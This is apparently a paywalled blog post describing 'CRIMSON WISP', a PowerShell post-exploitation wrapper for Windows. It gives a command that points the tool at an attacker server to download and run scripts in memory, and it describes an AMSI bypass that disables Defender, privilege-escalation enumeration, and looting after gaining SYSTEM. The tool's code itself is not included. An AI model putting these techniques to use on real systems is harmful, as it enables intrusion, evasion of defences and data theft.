Member-only story
CRIMSON WISP
Windows Post-Exploitation tools wrapper.
INTRODUCTION
A quick tour of a tool that automates post-exploitation tasks.
FUNCTIONALITIES
You have to first set the URL for the rest functions and then load scripts:
Invoke-Wisp -Url http://<your_server>
. memory_loadMake sure you have write permissions to the current directory.
- Enumerating system for Privilege escalation.
escalation- Looting the system after escalating to NT AUTHORITY\SYSTEM.
lootingTHE CODE
The main features of the program are those mentioned above. However, the program does much more behind your back. The tool code is shown below. It will probably change in the future, but the main idea will be the same.
Invoke-Wisp
Function set the global variable URL, which will be used for downloading.
The Invoke-Wisp will automatically use the bypass_amsi described below.
Bypass_AMSI
Function download isma.txt file turns off the AMSI.dll and thus Microsoft Defender in PowerShell memory.
Memory_Load
Function download & load to memory PowerShell scripts. You can add your scripts here so they will be downloaded in one command.
Please make sure you are dot sourcing the function when you are using it to load the script to the global scope. Otherwise, the scripts will only be loaded in function scope and will not run globally.
Escalation
Function download & run in PowerShell memory escalate.txtfile, which executes a series of commands for Privilege Escalation enumeration and, in the end, reminds the user about a few additional manual checks.
